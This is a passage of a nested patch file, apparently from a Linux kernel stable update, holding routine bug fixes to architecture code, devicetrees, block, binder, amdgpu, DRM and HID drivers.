+-static int save_arcv2_regs(struct sigcontext *mctx, struct pt_regs *regs)
++static int save_arcv2_regs(struct sigcontext __user *mctx, struct pt_regs *regs)
+ {
+ 	int err = 0;
+ #ifndef CONFIG_ISA_ARCOMPACT
+@@ -74,12 +74,12 @@ static int save_arcv2_regs(struct sigcontext *mctx, struct pt_regs *regs)
+ #else
+ 	v2abi.r58 = v2abi.r59 = 0;
+ #endif
+-	err = __copy_to_user(&mctx->v2abi, &v2abi, sizeof(v2abi));
++	err = __copy_to_user(&mctx->v2abi, (void const *)&v2abi, sizeof(v2abi));
+ #endif
+ 	return err;
+ }
+ 
+-static int restore_arcv2_regs(struct sigcontext *mctx, struct pt_regs *regs)
++static int restore_arcv2_regs(struct sigcontext __user *mctx, struct pt_regs *regs)
+ {
+ 	int err = 0;
+ #ifndef CONFIG_ISA_ARCOMPACT
+diff --git a/arch/arm/mach-sunxi/mc_smp.c b/arch/arm/mach-sunxi/mc_smp.c
+index b2f5f4f28705f..f779e386b6e7d 100644
+--- a/arch/arm/mach-sunxi/mc_smp.c
++++ b/arch/arm/mach-sunxi/mc_smp.c
+@@ -804,12 +804,12 @@ static int __init sunxi_mc_smp_init(void)
+ 	for (i = 0; i < ARRAY_SIZE(sunxi_mc_smp_data); i++) {
+ 		ret = of_property_match_string(node, "enable-method",
+ 					       sunxi_mc_smp_data[i].enable_method);
+-		if (!ret)
++		if (ret >= 0)
+ 			break;
+ 	}
+ 
+ 	of_node_put(node);
+-	if (ret)
++	if (ret < 0)
+ 		return -ENODEV;
+ 
+ 	is_a83t = sunxi_mc_smp_data[i].is_a83t;
+diff --git a/arch/arm64/boot/dts/rockchip/rk3399-gru-chromebook.dtsi b/arch/arm64/boot/dts/rockchip/rk3399-gru-chromebook.dtsi
+index ee6095baba4d3..7d9b8064ad2ec 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3399-gru-chromebook.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk3399-gru-chromebook.dtsi
+@@ -510,8 +510,7 @@ ap_i2c_tp: &i2c5 {
+ &pci_rootport {
+ 	mvl_wifi: wifi@0,0 {
+ 		compatible = "pci1b4b,2b42";
+-		reg = <0x83010000 0x0 0x00000000 0x0 0x00100000
+-		       0x83010000 0x0 0x00100000 0x0 0x00100000>;
++		reg = <0x0000 0x0 0x0 0x0 0x0>;
+ 		interrupt-parent = <&gpio0>;
+ 		interrupts = <8 IRQ_TYPE_LEVEL_LOW>;
+ 		pinctrl-names = "default";
+diff --git a/arch/arm64/boot/dts/rockchip/rk3399-gru-scarlet-dumo.dts b/arch/arm64/boot/dts/rockchip/rk3399-gru-scarlet-dumo.dts
+index 853e88455e750..9e4b12ed62cbe 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3399-gru-scarlet-dumo.dts
++++ b/arch/arm64/boot/dts/rockchip/rk3399-gru-scarlet-dumo.dts
+@@ -34,8 +34,8 @@
+ &pci_rootport {
+ 	wifi@0,0 {
+ 		compatible = "qcom,ath10k";
+-		reg = <0x00010000 0x0 0x00000000 0x0 0x00000000>,
+-		      <0x03010010 0x0 0x00000000 0x0 0x00200000>;
++		reg = <0x00000000 0x0 0x00000000 0x0 0x00000000>,
++		      <0x03000010 0x0 0x00000000 0x0 0x00200000>;
+ 		qcom,ath10k-calibration-variant = "GO_DUMO";
+ 	};
+ };
+diff --git a/arch/arm64/boot/dts/rockchip/rk3399-gru.dtsi b/arch/arm64/boot/dts/rockchip/rk3399-gru.dtsi
+index 23bfba86daabe..7ba25315dd9ab 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3399-gru.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk3399-gru.dtsi
+@@ -489,6 +489,7 @@ ap_i2c_audio: &i2c8 {
+ 		#address-cells = <3>;
+ 		#size-cells = <2>;
+ 		ranges;
++		device_type = "pci";
+ 	};
+ };
+ 
+diff --git a/arch/arm64/boot/dts/rockchip/rk356x.dtsi b/arch/arm64/boot/dts/rockchip/rk356x.dtsi
+index 234b5bbda1204..f4d6dbbbddcd4 100644
+--- a/arch/arm64/boot/dts/rockchip/rk356x.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk356x.dtsi
+@@ -958,7 +958,7 @@
+ 			     <GIC_SPI 73 IRQ_TYPE_LEVEL_HIGH>,
+ 			     <GIC_SPI 72 IRQ_TYPE_LEVEL_HIGH>,
+ 			     <GIC_SPI 71 IRQ_TYPE_LEVEL_HIGH>;
+-		interrupt-names = "sys", "pmc", "msi", "legacy", "err";
++		interrupt-names = "sys", "pmc", "msg", "legacy", "err";
+ 		bus-range = <0x0 0xf>;
+ 		clocks = <&cru ACLK_PCIE20_MST>, <&cru ACLK_PCIE20_SLV>,
+ 			 <&cru ACLK_PCIE20_DBI>, <&cru PCLK_PCIE20>,
+diff --git a/arch/loongarch/include/asm/elf.h b/arch/loongarch/include/asm/elf.h
+index b9a4ab54285c1..9b16a3b8e7060 100644
+--- a/arch/loongarch/include/asm/elf.h
++++ b/arch/loongarch/include/asm/elf.h
+@@ -293,7 +293,7 @@ extern const char *__elf_platform;
+ #define ELF_PLAT_INIT(_r, load_addr)	do { \
+ 	_r->regs[1] = _r->regs[2] = _r->regs[3] = _r->regs[4] = 0;	\
+ 	_r->regs[5] = _r->regs[6] = _r->regs[7] = _r->regs[8] = 0;	\
+-	_r->regs[9] = _r->regs[10] = _r->regs[11] = _r->regs[12] = 0;	\
++	_r->regs[9] = _r->regs[10] /* syscall n */ = _r->regs[12] = 0;	\
+ 	_r->regs[13] = _r->regs[14] = _r->regs[15] = _r->regs[16] = 0;	\
+ 	_r->regs[17] = _r->regs[18] = _r->regs[19] = _r->regs[20] = 0;	\
+ 	_r->regs[21] = _r->regs[22] = _r->regs[23] = _r->regs[24] = 0;	\
+diff --git a/arch/mips/boot/dts/loongson/loongson64-2k1000.dtsi b/arch/mips/boot/dts/loongson/loongson64-2k1000.dtsi
+index 8143a61111e33..c16b521308cb1 100644
+--- a/arch/mips/boot/dts/loongson/loongson64-2k1000.dtsi
++++ b/arch/mips/boot/dts/loongson/loongson64-2k1000.dtsi
+@@ -123,8 +123,7 @@
+ 				compatible = "pci0014,7a03.0",
+ 						   "pci0014,7a03",
+ 						   "pciclass0c0320",
+-						   "pciclass0c03",
+-						   "loongson, pci-gmac";
++						   "pciclass0c03";
+ 
+ 				reg = <0x1800 0x0 0x0 0x0 0x0>;
+ 				interrupts = <12 IRQ_TYPE_LEVEL_LOW>,
+diff --git a/arch/mips/boot/dts/loongson/ls7a-pch.dtsi b/arch/mips/boot/dts/loongson/ls7a-pch.dtsi
+index 2f45fce2cdc4a..ed99ee316febb 100644
+--- a/arch/mips/boot/dts/loongson/ls7a-pch.dtsi
++++ b/arch/mips/boot/dts/loongson/ls7a-pch.dtsi
+@@ -186,8 +186,7 @@
+ 				compatible = "pci0014,7a03.0",
+ 						   "pci0014,7a03",
+ 						   "pciclass020000",
+-						   "pciclass0200",
+-						   "loongson, pci-gmac";
++						   "pciclass0200";
+ 
+ 				reg = <0x1800 0x0 0x0 0x0 0x0>;
+ 				interrupts = <12 IRQ_TYPE_LEVEL_HIGH>,
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index 383d94615e502..368f1947c8956 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -1500,14 +1500,26 @@ void blk_mq_delay_kick_requeue_list(struct request_queue *q,
+ }
+ EXPORT_SYMBOL(blk_mq_delay_kick_requeue_list);
+ 
++static bool blk_is_flush_data_rq(struct request *rq)
++{
++	return (rq->rq_flags & RQF_FLUSH_SEQ) && !is_flush_rq(rq);
++}
++
+ static bool blk_mq_rq_inflight(struct request *rq, void *priv)
+ {
+ 	/*
+ 	 * If we find a request that isn't idle we know the queue is busy
+ 	 * as it's checked in the iter.
+ 	 * Return false to stop the iteration.
++	 *
++	 * In case of queue quiesce, if one flush data request is completed,
++	 * don't count it as inflight given the flush sequence is suspended,
++	 * and the original flush data request is invisible to driver, just
++	 * like other pending requests because of quiesce
+ 	 */
+-	if (blk_mq_request_started(rq)) {
++	if (blk_mq_request_started(rq) && !(blk_queue_quiesced(rq->q) &&
++				blk_is_flush_data_rq(rq) &&
++				blk_mq_request_completed(rq))) {
+ 		bool *busy = priv;
+ 
+ 		*busy = true;
+diff --git a/drivers/acpi/resource.c b/drivers/acpi/resource.c
+index c297e40c5bdc0..5ebeb0d7b6be0 100644
+--- a/drivers/acpi/resource.c
++++ b/drivers/acpi/resource.c
+@@ -512,6 +512,13 @@ static const struct dmi_system_id maingear_laptop[] = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "GMxXGxx"),
+ 		},
+ 	},
++	{
++		/* TongFang GMxXGxx sold as Eluktronics Inc. RP-15 */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Eluktronics Inc."),
++			DMI_MATCH(DMI_BOARD_NAME, "RP-15"),
++		},
++	},
+ 	{
+ 		/* TongFang GM6XGxX/TUXEDO Stellaris 16 Gen5 AMD */
+ 		.matches = {
+diff --git a/drivers/android/binder.c b/drivers/android/binder.c
+index 9cc3a2b1b4fc1..d933ef6cc65af 100644
+--- a/drivers/android/binder.c
++++ b/drivers/android/binder.c
+@@ -5005,7 +5005,7 @@ static __poll_t binder_poll(struct file *filp,
+ 
+ 	thread = binder_get_thread(proc);
+ 	if (!thread)
+-		return POLLERR;
++		return EPOLLERR;
+ 
+ 	binder_inner_proc_lock(thread->proc);
+ 	thread->looper |= BINDER_LOOPER_STATE_POLL;
+diff --git a/drivers/android/binder_alloc.c b/drivers/android/binder_alloc.c
+index cd87f12733f27..ed607850f87fb 100644
+--- a/drivers/android/binder_alloc.c
++++ b/drivers/android/binder_alloc.c
+@@ -557,7 +557,7 @@ err_alloc_buf_struct_failed:
+  * is the sum of the three given sizes (each rounded up to
+  * pointer-sized boundary)
+  *
+- * Return:	The allocated buffer or %NULL if error
++ * Return:	The allocated buffer or %ERR_PTR(-errno) if error
+  */
+ struct binder_buffer *binder_alloc_new_buf(struct binder_alloc *alloc,
+ 					   size_t data_size,
+@@ -706,7 +706,7 @@ void binder_alloc_free_buf(struct binder_alloc *alloc,
+ 	/*
+ 	 * We could eliminate the call to binder_alloc_clear_buf()
+ 	 * from binder_alloc_deferred_release() by moving this to
+-	 * binder_alloc_free_buf_locked(). However, that could
++	 * binder_free_buf_locked(). However, that could
+ 	 * increase contention for the alloc mutex if clear_on_free
+ 	 * is used frequently for large buffers. The mutex is not
+ 	 * needed for correctness here.
+@@ -1005,7 +1005,9 @@ enum lru_status binder_alloc_free_page(struct list_head *item,
+ 		goto err_mmget;
+ 	if (!mmap_read_trylock(mm))
+ 		goto err_mmap_read_lock_failed;
+-	vma = binder_alloc_get_vma(alloc);
++	vma = vma_lookup(mm, page_addr);
++	if (vma && vma != binder_alloc_get_vma(alloc))
++		goto err_invalid_vma;
+ 
+ 	list_lru_isolate(lru, item);
+ 	spin_unlock(lock);
+@@ -1031,6 +1033,8 @@ enum lru_status binder_alloc_free_page(struct list_head *item,
+ 	mutex_unlock(&alloc->mutex);
+ 	return LRU_REMOVED_RETRY;
+ 
++err_invalid_vma:
++	mmap_read_unlock(mm);
+ err_mmap_read_lock_failed:
+ 	mmput_async(mm);
+ err_mmget:
+diff --git a/drivers/block/virtio_blk.c b/drivers/block/virtio_blk.c
+index efa5535a8e1d8..3124837aa406f 100644
+--- a/drivers/block/virtio_blk.c
++++ b/drivers/block/virtio_blk.c
+@@ -609,12 +609,12 @@ static void virtblk_config_changed(struct virtio_device *vdev)
+ static int init_vq(struct virtio_blk *vblk)
+ {
+ 	int err;
+-	int i;
++	unsigned short i;
+ 	vq_callback_t **callbacks;
+ 	const char **names;
+ 	struct virtqueue **vqs;
+ 	unsigned short num_vqs;
+-	unsigned int num_poll_vqs;
++	unsigned short num_poll_vqs;
+ 	struct virtio_device *vdev = vblk->vdev;
+ 	struct irq_affinity desc = { 0, };
+ 
+@@ -658,13 +658,13 @@ static int init_vq(struct virtio_blk *vblk)
+ 
+ 	for (i = 0; i < num_vqs - num_poll_vqs; i++) {
+ 		callbacks[i] = virtblk_done;
+-		snprintf(vblk->vqs[i].name, VQ_NAME_LEN, "req.%d", i);
++		snprintf(vblk->vqs[i].name, VQ_NAME_LEN, "req.%u", i);
+ 		names[i] = vblk->vqs[i].name;
+ 	}
+ 
+ 	for (; i < num_vqs; i++) {
+ 		callbacks[i] = NULL;
+-		snprintf(vblk->vqs[i].name, VQ_NAME_LEN, "req_poll.%d", i);
++		snprintf(vblk->vqs[i].name, VQ_NAME_LEN, "req_poll.%u", i);
+ 		names[i] = vblk->vqs[i].name;
+ 	}
+ 
+diff --git a/drivers/clk/rockchip/clk-rk3128.c b/drivers/clk/rockchip/clk-rk3128.c
+index aa53797dbfc14..7782785a86e69 100644
+--- a/drivers/clk/rockchip/clk-rk3128.c
++++ b/drivers/clk/rockchip/clk-rk3128.c
+@@ -490,7 +490,7 @@ static struct rockchip_clk_branch common_clk_branches[] __initdata = {
+ 	GATE(HCLK_I2S_2CH, "hclk_i2s_2ch", "hclk_peri", 0, RK2928_CLKGATE_CON(7), 2, GFLAGS),
+ 	GATE(0, "hclk_usb_peri", "hclk_peri", CLK_IGNORE_UNUSED, RK2928_CLKGATE_CON(9), 13, GFLAGS),
+ 	GATE(HCLK_HOST2, "hclk_host2", "hclk_peri", 0, RK2928_CLKGATE_CON(7), 3, GFLAGS),
+-	GATE(HCLK_OTG, "hclk_otg", "hclk_peri", 0, RK2928_CLKGATE_CON(3), 13, GFLAGS),
++	GATE(HCLK_OTG, "hclk_otg", "hclk_peri", 0, RK2928_CLKGATE_CON(5), 13, GFLAGS),
+ 	GATE(0, "hclk_peri_ahb", "hclk_peri", CLK_IGNORE_UNUSED, RK2928_CLKGATE_CON(9), 14, GFLAGS),
+ 	GATE(HCLK_SPDIF, "hclk_spdif", "hclk_peri", 0, RK2928_CLKGATE_CON(10), 9, GFLAGS),
+ 	GATE(HCLK_TSP, "hclk_tsp", "hclk_peri", 0, RK2928_CLKGATE_CON(10), 12, GFLAGS),
+diff --git a/drivers/clk/rockchip/clk-rk3568.c b/drivers/clk/rockchip/clk-rk3568.c
+index 2f54f630c8b65..1ffb755feea4f 100644
+--- a/drivers/clk/rockchip/clk-rk3568.c
++++ b/drivers/clk/rockchip/clk-rk3568.c
+@@ -72,6 +72,7 @@ static struct rockchip_pll_rate_table rk3568_pll_rates[] = {
+ 	RK3036_PLL_RATE(408000000, 1, 68, 2, 2, 1, 0),
+ 	RK3036_PLL_RATE(312000000, 1, 78, 6, 1, 1, 0),
+ 	RK3036_PLL_RATE(297000000, 2, 99, 4, 1, 1, 0),
++	RK3036_PLL_RATE(292500000, 1, 195, 4, 4, 1, 0),
+ 	RK3036_PLL_RATE(241500000, 2, 161, 4, 2, 1, 0),
+ 	RK3036_PLL_RATE(216000000, 1, 72, 4, 2, 1, 0),
+ 	RK3036_PLL_RATE(200000000, 1, 100, 3, 4, 1, 0),
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_debugfs.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_debugfs.c
+index fd796574f87a5..8123feb1a1161 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_debugfs.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_debugfs.c
+@@ -479,6 +479,9 @@ static ssize_t amdgpu_debugfs_regs_didt_read(struct file *f, char __user *buf,
+ 	if (size & 0x3 || *pos & 0x3)
+ 		return -EINVAL;
+ 
++	if (!adev->didt_rreg)
++		return -EOPNOTSUPP;
++
+ 	r = pm_runtime_get_sync(adev_to_drm(adev)->dev);
+ 	if (r < 0) {
+ 		pm_runtime_put_autosuspend(adev_to_drm(adev)->dev);
+@@ -535,6 +538,9 @@ static ssize_t amdgpu_debugfs_regs_didt_write(struct file *f, const char __user
+ 	if (size & 0x3 || *pos & 0x3)
+ 		return -EINVAL;
+ 
++	if (!adev->didt_wreg)
++		return -EOPNOTSUPP;
++
+ 	r = pm_runtime_get_sync(adev_to_drm(adev)->dev);
+ 	if (r < 0) {
+ 		pm_runtime_put_autosuspend(adev_to_drm(adev)->dev);
+diff --git a/drivers/gpu/drm/amd/amdgpu/soc15.c b/drivers/gpu/drm/amd/amdgpu/soc15.c
+index 2eddd7f6cd41e..811dd3ea63620 100644
+--- a/drivers/gpu/drm/amd/amdgpu/soc15.c
++++ b/drivers/gpu/drm/amd/amdgpu/soc15.c
+@@ -1411,9 +1411,11 @@ static void soc15_common_get_clockgating_state(void *handle, u64 *flags)
+ 	if (amdgpu_sriov_vf(adev))
+ 		*flags = 0;
+ 
+-	adev->nbio.funcs->get_clockgating_state(adev, flags);
++	if (adev->nbio.funcs && adev->nbio.funcs->get_clockgating_state)
++		adev->nbio.funcs->get_clockgating_state(adev, flags);
+ 
+-	adev->hdp.funcs->get_clock_gating_state(adev, flags);
++	if (adev->hdp.funcs && adev->hdp.funcs->get_clock_gating_state)
++		adev->hdp.funcs->get_clock_gating_state(adev, flags);
+ 
+ 	if (adev->ip_versions[MP0_HWIP][0] != IP_VERSION(13, 0, 2)) {
+ 
+@@ -1429,9 +1431,11 @@ static void soc15_common_get_clockgating_state(void *handle, u64 *flags)
+ 	}
+ 
+ 	/* AMD_CG_SUPPORT_ROM_MGCG */
+-	adev->smuio.funcs->get_clock_gating_state(adev, flags);
++	if (adev->smuio.funcs && adev->smuio.funcs->get_clock_gating_state)
++		adev->smuio.funcs->get_clock_gating_state(adev, flags);
+ 
+-	adev->df.funcs->get_clockgating_state(adev, flags);
++	if (adev->df.funcs && adev->df.funcs->get_clockgating_state)
++		adev->df.funcs->get_clockgating_state(adev, flags);
+ }
+ 
+ static int soc15_common_set_powergating_state(void *handle,
+diff --git a/drivers/gpu/drm/amd/display/dc/bios/bios_parser2.c b/drivers/gpu/drm/amd/display/dc/bios/bios_parser2.c
+index e507d2e1410b7..93e40e0a15087 100644
+--- a/drivers/gpu/drm/amd/display/dc/bios/bios_parser2.c
++++ b/drivers/gpu/drm/amd/display/dc/bios/bios_parser2.c
+@@ -1018,13 +1018,20 @@ static enum bp_result get_ss_info_v4_5(
+ 		DC_LOG_BIOS("AS_SIGNAL_TYPE_HDMI ss_percentage: %d\n", ss_info->spread_spectrum_percentage);
+ 		break;
+ 	case AS_SIGNAL_TYPE_DISPLAY_PORT:
+-		ss_info->spread_spectrum_percentage =
++		if (bp->base.integrated_info) {
++			DC_LOG_BIOS("gpuclk_ss_percentage (unit of 0.001 percent): %d\n", bp->base.integrated_info->gpuclk_ss_percentage);
++			ss_info->spread_spectrum_percentage =
++					bp->base.integrated_info->gpuclk_ss_percentage;
++			ss_info->type.CENTER_MODE =
++					bp->base.integrated_info->gpuclk_ss_type;
++		} else {
++			ss_info->spread_spectrum_percentage =
+ 				disp_cntl_tbl->dp_ss_percentage;
+-		ss_info->spread_spectrum_range =
++			ss_info->spread_spectrum_range =
+ 				disp_cntl_tbl->dp_ss_rate_10hz * 10;
+-		if (disp_cntl_tbl->dp_ss_mode & ATOM_SS_CENTRE_SPREAD_MODE)
+-			ss_info->type.CENTER_MODE = true;
+-
++			if (disp_cntl_tbl->dp_ss_mode & ATOM_SS_CENTRE_SPREAD_MODE)
++				ss_info->type.CENTER_MODE = true;
++		}
+ 		DC_LOG_BIOS("AS_SIGNAL_TYPE_DISPLAY_PORT ss_percentage: %d\n", ss_info->spread_spectrum_percentage);
+ 		break;
+ 	case AS_SIGNAL_TYPE_GPU_PLL:
+@@ -2830,6 +2837,8 @@ static enum bp_result get_integrated_info_v2_2(
+ 	info->ma_channel_number = info_v2_2->umachannelnumber;
+ 	info->dp_ss_control =
+ 		le16_to_cpu(info_v2_2->reserved1);
++	info->gpuclk_ss_percentage = info_v2_2->gpuclk_ss_percentage;
++	info->gpuclk_ss_type = info_v2_2->gpuclk_ss_type;
+ 
+ 	for (i = 0; i < NUMBER_OF_UCHAR_FOR_GUID; ++i) {
+ 		info->ext_disp_conn_info.gu_id[i] =
+diff --git a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn315/dcn315_clk_mgr.c b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn315/dcn315_clk_mgr.c
+index 893991a0eb971..28b83133db910 100644
+--- a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn315/dcn315_clk_mgr.c
++++ b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn315/dcn315_clk_mgr.c
+@@ -324,7 +324,7 @@ static struct wm_table lpddr5_wm_table = {
+ 		{
+ 			.wm_inst = WM_A,
+ 			.wm_type = WM_TYPE_PSTATE_CHG,
+-			.pstate_latency_us = 11.65333,
++			.pstate_latency_us = 129.0,
+ 			.sr_exit_time_us = 11.5,
+ 			.sr_enter_plus_exit_time_us = 14.5,
+ 			.valid = true,
+@@ -332,7 +332,7 @@ static struct wm_table lpddr5_wm_table = {
+ 		{
+ 			.wm_inst = WM_B,
+ 			.wm_type = WM_TYPE_PSTATE_CHG,
+-			.pstate_latency_us = 11.65333,
++			.pstate_latency_us = 129.0,
+ 			.sr_exit_time_us = 11.5,
+ 			.sr_enter_plus_exit_time_us = 14.5,
+ 			.valid = true,
+@@ -340,7 +340,7 @@ static struct wm_table lpddr5_wm_table = {
+ 		{
+ 			.wm_inst = WM_C,
+ 			.wm_type = WM_TYPE_PSTATE_CHG,
+-			.pstate_latency_us = 11.65333,
++			.pstate_latency_us = 129.0,
+ 			.sr_exit_time_us = 11.5,
+ 			.sr_enter_plus_exit_time_us = 14.5,
+ 			.valid = true,
+@@ -348,7 +348,7 @@ static struct wm_table lpddr5_wm_table = {
+ 		{
+ 			.wm_inst = WM_D,
+ 			.wm_type = WM_TYPE_PSTATE_CHG,
+-			.pstate_latency_us = 11.65333,
++			.pstate_latency_us = 129.0,
+ 			.sr_exit_time_us = 11.5,
+ 			.sr_enter_plus_exit_time_us = 14.5,
+ 			.valid = true,
+diff --git a/drivers/gpu/drm/amd/display/include/grph_object_ctrl_defs.h b/drivers/gpu/drm/amd/display/include/grph_object_ctrl_defs.h
+index bc96d02113608..813463ffe15c5 100644
+--- a/drivers/gpu/drm/amd/display/include/grph_object_ctrl_defs.h
++++ b/drivers/gpu/drm/amd/display/include/grph_object_ctrl_defs.h
+@@ -417,6 +417,8 @@ struct integrated_info {
+ 	/* V2.1 */
+ 	struct edp_info edp1_info;
+ 	struct edp_info edp2_info;
++	uint32_t gpuclk_ss_percentage;
++	uint32_t gpuclk_ss_type;
+ };
+ 
+ /*
+diff --git a/drivers/gpu/drm/drm_crtc.c b/drivers/gpu/drm/drm_crtc.c
+index df9bf3c9206e7..cb90e70d85e86 100644
+--- a/drivers/gpu/drm/drm_crtc.c
++++ b/drivers/gpu/drm/drm_crtc.c
+@@ -715,8 +715,7 @@ int drm_mode_setcrtc(struct drm_device *dev, void *data,
+ 	struct drm_mode_set set;
+ 	uint32_t __user *set_connectors_ptr;
+ 	struct drm_modeset_acquire_ctx ctx;
+-	int ret;
+-	int i;
++	int ret, i, num_connectors = 0;
+ 
+ 	if (!drm_core_check_feature(dev, DRIVER_MODESET))
+ 		return -EOPNOTSUPP;
+@@ -871,6 +870,7 @@ int drm_mode_setcrtc(struct drm_device *dev, void *data,
+ 					connector->name);
+ 
+ 			connector_set[i] = connector;
++			num_connectors++;
+ 		}
+ 	}
+ 
+@@ -879,7 +879,7 @@ int drm_mode_setcrtc(struct drm_device *dev, void *data,
+ 	set.y = crtc_req->y;
+ 	set.mode = mode;
+ 	set.connectors = connector_set;
+-	set.num_connectors = crtc_req->count_connectors;
++	set.num_connectors = num_connectors;
+ 	set.fb = fb;
+ 
+ 	if (drm_drv_uses_atomic_modeset(dev))
+@@ -892,7 +892,7 @@ out:
+ 		drm_framebuffer_put(fb);
+ 
+ 	if (connector_set) {
+-		for (i = 0; i < crtc_req->count_connectors; i++) {
++		for (i = 0; i < num_connectors; i++) {
+ 			if (connector_set[i])
+ 				drm_connector_put(connector_set[i]);
+ 		}
+diff --git a/drivers/gpu/drm/exynos/exynos_drm_dma.c b/drivers/gpu/drm/exynos/exynos_drm_dma.c
+index a971590b81323..e2c7373f20c6b 100644
+--- a/drivers/gpu/drm/exynos/exynos_drm_dma.c
++++ b/drivers/gpu/drm/exynos/exynos_drm_dma.c
+@@ -107,18 +107,16 @@ int exynos_drm_register_dma(struct drm_device *drm, struct device *dev,
+ 		return 0;
+ 
+ 	if (!priv->mapping) {
+-		void *mapping;
++		void *mapping = NULL;
+ 
+ 		if (IS_ENABLED(CONFIG_ARM_DMA_USE_IOMMU))
+ 			mapping = arm_iommu_create_mapping(&platform_bus_type,
+ 				EXYNOS_DEV_ADDR_START, EXYNOS_DEV_ADDR_SIZE);
+ 		else if (IS_ENABLED(CONFIG_IOMMU_DMA))
+ 			mapping = iommu_get_domain_for_dev(priv->dma_dev);
+-		else
+-			mapping = ERR_PTR(-ENODEV);
+ 
+-		if (IS_ERR(mapping))
+-			return PTR_ERR(mapping);
++		if (!mapping)
++			return -ENODEV;
+ 		priv->mapping = mapping;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/exynos/exynos_hdmi.c b/drivers/gpu/drm/exynos/exynos_hdmi.c
+index b7c11bdce2c89..1a7194a653ae5 100644
+--- a/drivers/gpu/drm/exynos/exynos_hdmi.c
++++ b/drivers/gpu/drm/exynos/exynos_hdmi.c
+@@ -1861,6 +1861,8 @@ static int hdmi_bind(struct device *dev, struct device *master, void *data)
+ 		return ret;
+ 
+ 	crtc = exynos_drm_crtc_get_by_type(drm_dev, EXYNOS_DISPLAY_TYPE_HDMI);
++	if (IS_ERR(crtc))
++		return PTR_ERR(crtc);
+ 	crtc->pipe_clk = &hdata->phy_clk;
+ 
+ 	ret = hdmi_create_connector(encoder);
+diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/mmu/vmmtu102.c b/drivers/gpu/drm/nouveau/nvkm/subdev/mmu/vmmtu102.c
+index 6cb5eefa45e9a..5a08458fe1b7f 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/subdev/mmu/vmmtu102.c
++++ b/drivers/gpu/drm/nouveau/nvkm/subdev/mmu/vmmtu102.c
+@@ -31,7 +31,7 @@ tu102_vmm_flush(struct nvkm_vmm *vmm, int depth)
+ 
+ 	type |= 0x00000001; /* PAGE_ALL */
+ 	if (atomic_read(&vmm->engref[NVKM_SUBDEV_BAR]))
+-		type |= 0x00000004; /* HUB_ONLY */
++		type |= 0x00000006; /* HUB_ONLY | ALL PDB (hack) */
+ 
+ 	mutex_lock(&vmm->mmu->mutex);
+ 
+diff --git a/drivers/hid/hid-nintendo.c b/drivers/hid/hid-nintendo.c
+index 8a8a3dd8af0c1..df07e3ae0ffb4 100644
+--- a/drivers/hid/hid-nintendo.c
++++ b/drivers/hid/hid-nintendo.c
+@@ -325,28 +325,28 @@ struct joycon_imu_cal {
+  * All the controller's button values are stored in a u32.
+  * They can be accessed with bitwise ANDs.
+  */
+-static const u32 JC_BTN_Y	= BIT(0);
+-static const u32 JC_BTN_X	= BIT(1);
+-static const u32 JC_BTN_B	= BIT(2);
+-static const u32 JC_BTN_A	= BIT(3);
+-static const u32 JC_BTN_SR_R	= BIT(4);
+-static const u32 JC_BTN_SL_R	= BIT(5);
+-static const u32 JC_BTN_R	= BIT(6);
+-static const u32 JC_BTN_ZR	= BIT(7);
+-static const u32 JC_BTN_MINUS	= BIT(8);
+-static const u32 JC_BTN_PLUS	= BIT(9);
+-static const u32 JC_BTN_RSTICK	= BIT(10);
+-static const u32 JC_BTN_LSTICK	= BIT(11);
+-static const u32 JC_BTN_HOME	= BIT(12);
+-static const u32 JC_BTN_CAP	= BIT(13); /* capture button */
+-static const u32 JC_BTN_DOWN	= BIT(16);
+-static const u32 JC_BTN_UP	= BIT(17);
+-static const u32 JC_BTN_RIGHT	= BIT(18);
+-static const u32 JC_BTN_LEFT	= BIT(19);
+-static const u32 JC_BTN_SR_L	= BIT(20);
+-static const u32 JC_BTN_SL_L	= BIT(21);
+-static const u32 JC_BTN_L	= BIT(22);
+-static const u32 JC_BTN_ZL	= BIT(23);
++#define JC_BTN_Y	 BIT(0)
++#define JC_BTN_X	 BIT(1)
++#define JC_BTN_B	 BIT(2)
++#define JC_BTN_A	 BIT(3)
++#define JC_BTN_SR_R	 BIT(4)
++#define JC_BTN_SL_R	 BIT(5)
++#define JC_BTN_R	 BIT(6)
++#define JC_BTN_ZR	 BIT(7)
++#define JC_BTN_MINUS	 BIT(8)
++#define JC_BTN_PLUS	 BIT(9)
++#define JC_BTN_RSTICK	 BIT(10)
++#define JC_BTN_LSTICK	 BIT(11)
++#define JC_BTN_HOME	 BIT(12)
++#define JC_BTN_CAP	 BIT(13) /* capture button */
++#define JC_BTN_DOWN	 BIT(16)
++#define JC_BTN_UP	 BIT(17)
++#define JC_BTN_RIGHT	 BIT(18)
++#define JC_BTN_LEFT	 BIT(19)
++#define JC_BTN_SR_L	 BIT(20)
++#define JC_BTN_SL_L	 BIT(21)
++#define JC_BTN_L	 BIT(22)
++#define JC_BTN_ZL	 BIT(23)
+ 
+ enum joycon_msg_type {
+ 	JOYCON_MSG_TYPE_NONE,
+@@ -859,14 +859,27 @@ static int joycon_request_calibration(struct joycon_ctlr *ctlr)
+  */
+ static void joycon_calc_imu_cal_divisors(struct joycon_ctlr *ctlr)
+ {
+-	int i;
++	int i, divz = 0;
+ 
+ 	for (i = 0; i < 3; i++) {
+ 		ctlr->imu_cal_accel_divisor[i] = ctlr->accel_cal.scale[i] -
+ 						ctlr->accel_cal.offset[i];
+ 		ctlr->imu_cal_gyro_divisor[i] = ctlr->gyro_cal.scale[i] -
+ 						ctlr->gyro_cal.offset[i];
++
